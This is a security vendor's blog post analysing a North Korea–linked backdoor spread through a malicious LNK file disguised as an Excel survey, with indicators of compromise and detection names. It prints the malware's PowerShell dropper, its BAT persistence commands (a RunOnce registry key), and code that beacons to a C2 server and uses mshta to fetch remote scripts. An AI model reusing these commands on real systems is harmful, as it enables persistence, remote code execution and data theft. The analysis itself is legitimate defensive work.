Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft) – ASEC BLOG

AhnLab Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously distributed in CHM format, is now being distributed in LNK format. This malware executes additional scripts located at a specific URL through the mshta process. It then receives commands from the threat actor’s server to carry out additional malicious behaviors.

The threat actor has been distributing the confirmed LNK file on a regular website by uploading it alongside malware within a compressed file.

Figure 1. Malware found at hxxp://a*****fo.co.kr/member/

The malicious LNK file has been uploaded under the file name ‘REPORT.ZIP.’ Similar to the malware identified in <RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)> [2], this file has an LNK that contains normal Excel document data and malicious script code.

Figure 2. Compressed file containing malicious LNK file
Figure 3. Additional file data included inside the LNK

Therefore, when the ‘Status Survey Table.xlsx.lnk’ file is executed, it creates and executes a normal document called ‘Status Survey Table.xlsx’ and the malicious script ‘PMmVvG56FLC9y.bat’ in the %Temp% folder through PowerShell commands.

/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%Status Survey Table.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = '%temp%PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& %windir%SysWOW64cmd.exe /c $WH9lSPHOFI;

‘Status Survey Table.xlsx’ appears as a normal Excel document and impersonates a Korean public organization in the following manner.

Figure 4. Contents and properties of ‘Status Survey Table.xlsx’

When the concurrently generated ‘PMmVvG56FLC9y.bat’ file is executed, it is copied into the ‘%appdata%MicrosoftProtect’ folder as ‘UserProfileSafeBackup.bat’. Afterward, it is registered in the following registry to ensure continuous execution of the BAT file.

  • Registry path: HKCU SoftwareMicrosoftWindowsCurrentVersionRunOnce
  • Value name: BackupUserProfiles
  • Value: C:WindowsSysWOW64cmd.exe /c %appdata%MicrosoftProtectUserProfileSafeBackup.bat

After registering to the above registry, a PowerShell command in hexadecimal format inside the BAT file is executed.

copy %~f0 "%appdata%MicrosoftProtectUserProfileSafeBackup.bat"
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:WindowsSysWOW64cmd.exe /c %appdata%MicrosoftProtectUserProfileSafeBackup.bat"
start /min C:WindowsSysWOW64cmd.exe /c powershell -windowstyle hidden -command 
"$m6drsidu ="$jWHmcU="""53746172742D536C656570202D<omitted>""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";
Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"

When the PowerShell command is executed, a Run key registration is carried out alongside the execution of additional scripts utilizing mshta. Furthermore, registry registrations can be performed through commands from the threat actor. The following is a portion of the PowerShell command represented in hexadecimal format within the code of the BAT file.

Start-Sleep -Seconds 67;
$nvSklUbaQ = 1024 * 1024;
$yixgsFVy = $env:COMPUTERNAME + '-' + $env:USERNAME+'-SH';
$aWw = 'hxxp://75.119.136[.]207/config/bases/config.php' + '?U=' + $yixgsFVy;
$bLmoifqHwJxhE = $env:TEMP + '/KsK';
if (!(Test-Path $bLmoifqHwJxhE)) { New-ItemProperty -Path "HKCU:SoftwareMicrosoftWindowsCurrentVersionRunOnce" -Name Olm -Value 'c:windowssystem32cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 311714 2.2.2.2 || mshta hxxp://bian0151.cafe24[.]com/admin/board/1.html' -PropertyType String -Force;}

The confirmed C2 and malicious URLs are as follows:

  • hxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH // Receives commands from the threat actor
  • hxxp://75.119.136.207/config/bases/config.php?R=[‘EOF’ encoded in base64] // Transmits command execution results
  • hxxp://bian0151.cafe24[.]com/admin/board/1.html // Downloads additional script codes

The additional script codes (hxxp://bian0151.cafe24.com/admin/board/1.html) executed through mshta contain a PowerShell command obfuscated in Base64 as shown below. This command performs functions similar to those previously disclosed in Table 1 of the post <RedEyes Group Wiretapping Individuals (APT37)> [3].

Figure 5. Malicious script found at hxxp://bian0151.cafe24.com/admin/board/1.html

The decoded PowerShell command receives and processes commands from the threat actor at hxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH. Figure 6 shows a portion of the decoded PowerShell command.

Figure 6. Decoded PowerShell command

The commands and features that can be performed are as follows.

Command Feature
pcinfo Collects PC information
drive Collects drive information
clipboard Collects clipboard content
svc Collects service information
process Collects information on running processes
fileinfo Collects the names, sizes, last used dates, and complete paths for the subfiles in the received path
start Executes received command through cmd
plugin Downloads and executes additional files through PowerShell
down Downloads additional files in the received path
up Uploads files from the received path
regedit Adds to the registry
compress Compresses files
Table 1. Commands and features that can be performed

It is suspected that the attacker is continuously modifying the script code, as the commands listed in Table 1 differ from those previously identified. Therefore, in addition to the functionalities confirmed so far, various other malicious activities may also be performed.

Aside from the LNK file, the compressed files ‘KB_20230531.rar’, ‘attachment.rar’, and ‘hanacard_20230610.rar’ that were identified alongside ‘REPORT.ZIP’ in Figure 1, also contain the previously identified malicious CHM file. Similar to the LNK file described earlier, this CHM file is malware that utilizes mshta to execute additional scripts located at specific URLs.

Figure 7. Compressed files containing a malicious CHM file

Due to the recent mass distribution of malware utilizing CHM and LNK files, users need to exercise extra caution. In the case of the malicious LNK files, it has been observed that a significant number of them have a file size exceeding 10 MB. Therefore, users must refrain from executing large LNK files from unknown sources.

[File Detection]
Dropper/LNK.Generic.S2241 (2023.04.24.02)
Trojan/BAT.PsExec.S2247 (2023.06.13.02)
Downloader/Script.Generic.SC191708 (2023.08.17.03)

[Behavior Detection]
DefenseEvasion/DETECT.T1059.M11294
DefenseEvasion/DETECT.T1059.M11295 

[IOC]
0eb8db3cbde470407f942fd63afe42b8
2d444b6f72c8327d1d155faa2cca7fd7
27f74072d6268b5d96d73107c560d852
hxxp://75.119.136[.]207/config/bases/config.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/56756/